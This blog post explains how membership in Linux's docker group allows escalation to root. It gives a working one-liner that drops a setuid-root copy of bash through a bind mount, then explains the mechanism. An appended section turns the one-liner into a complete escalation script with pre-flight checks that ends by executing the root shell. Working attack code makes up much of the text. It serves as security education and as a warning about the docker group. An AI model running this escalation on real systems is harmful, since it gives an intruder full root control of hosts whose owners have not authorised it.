One-Liner Linux Privilege Escalation with Docker 1.12.6

I just came up with this on my own, got excited, then saw that this technique has been around for a couple of years already, but what the hell? I already wrote the post, so here you go:

A common step during the Docker installation process is to add a user to the “docker” group so that they can run containers without sudo-ing. People have warned that this is dangerous. They are correct: membership in that group grants write access to the Docker daemon's socket, and the daemon runs as root, so anything a group member asks it to do happens with root privileges.

If an attacker pops your box and lands on a low-priv account BUT that account can run Docker containers, the attacker can escalate to root on Linux trivially. Like so:

$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

Screenshot of Linux Privilege Escalation with Docker


What’s going on here?

When you run a Docker container, the process inside it runs as root (uid 0) by default. So the line:

cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;

is run as root inside the container, so you get a copy of bash with the setuid bit set saved into /h_docs INSIDE the container. Because Docker does not remap user IDs by default, root inside the container is the same uid 0 as on the host, and the copy written through the bind mount is owned by root on the host as well. (The binary comes from the ubuntu image rather than the host, so it still has to load against the host's shared libraries; this works as long as the host's libc is compatible with the one the image's bash was built against.)

/h_docs is of course mapped to a directory on your host file system (you could find which one with docker inspect), so the file lands there. To make things easy, we map the volume to our low-priv user's home directory.

That's where this part of the docker run command comes from:

-v /home/${USER}:/h_docs

After the container finishes running the command, you will find a lovely new root-owned, setuid, executable file in the home directory called rootshell. (This assumes the home directory is on a filesystem mounted without the nosuid option; on a nosuid mount the kernel ignores the setuid bit and the trick fails.)

Screenshot of ls -a ~/rootshell

Then run it with the -p flag and you are golden. Bash normally drops privileges when it starts with an effective uid that differs from the real uid (it resets the effective uid back to the real one); -p turns that safeguard off, so the shell keeps effective uid 0.
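The one-liner above, expanded as an added example (not code from the original post) into a script with the pre-flight checks a practitioner would run first: is the account actually in the docker group, is the target directory on a nosuid mount (where the setuid bit is ignored), and did a root-owned setuid file really appear before it is executed. It assumes GNU coreutils stat, util-linux findmnt, a docker CLI on PATH that can pull the ubuntu image, and a target directory on a filesystem without nosuid; the helper names are this example's own.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: the docker-group escalation
# with pre-flight checks. Assumes GNU stat, util-linux findmnt and a working
# docker CLI; helper names are this example's own.

# Return 0 if the space-separated group list (as printed by `id -nG`)
# contains the docker group.
in_docker_group() {
    local groups=$1 g
    for g in $groups; do
        [ "$g" = docker ] && return 0
    done
    return 1
}

# Return 0 if a comma-separated mount option string (as printed by
# `findmnt -n -o OPTIONS`) contains nosuid. On such a mount the kernel
# ignores the setuid bit, so the dropped rootshell would run as the caller.
mount_is_nosuid() {
    case ",$1," in
        *,nosuid,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Return 0 if FILE exists, is owned by uid 0 and has the setuid bit set.
# GNU stat prints the mode in octal without a leading zero (e.g. 4777),
# so prefix one to get an octal constant for the bit test.
is_suid_root() {
    local file=$1 mode uid
    [ -f "$file" ] || return 1
    mode=$(stat -c '%a' "$file") || return 1
    uid=$(stat -c '%u' "$file") || return 1
    [ "$uid" -eq 0 ] && [ $(( 0$mode & 04000 )) -ne 0 ]
}

# Drop a setuid-root copy of bash into TARGET via a bind mount and exec it.
escalate() {
    local target=${1:-$HOME} name=rootshell
    in_docker_group "$(id -nG)" || { echo "not in the docker group" >&2; return 1; }
    if mount_is_nosuid "$(findmnt -n -o OPTIONS -T "$target")"; then
        echo "$target is on a nosuid mount; the setuid bit would be ignored" >&2
        return 1
    fi
    # Same as the one-liner, but 4755 is all that is needed (world-writable
    # gains nothing) and --rm cleans up the container afterwards.
    docker run --rm -v "$target:/h_docs" ubuntu \
        bash -c "cp /bin/bash /h_docs/$name && chmod 4755 /h_docs/$name" || return 1
    is_suid_root "$target/$name" || { echo "no setuid-root file in $target" >&2; return 1; }
    # -p keeps bash from resetting its effective uid back to the real uid.
    exec "$target/$name" -p
}

# Only escalate when invoked as `./dockeresc.sh run [dir]`; sourcing the
# file just defines the functions.
if [ "${1:-}" = run ]; then
    escalate "${2:-$HOME}"
fi
```

Run it as `./dockeresc.sh run` from the low-priv account; each check prints why it stopped, which is also the quickest way to confirm on a hardened host (no docker group membership, or home on a nosuid mount) that the escalation path is closed.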

Once again:

Screenshot of Linux Privilege Escalation with Docker

Written on April 17, 2017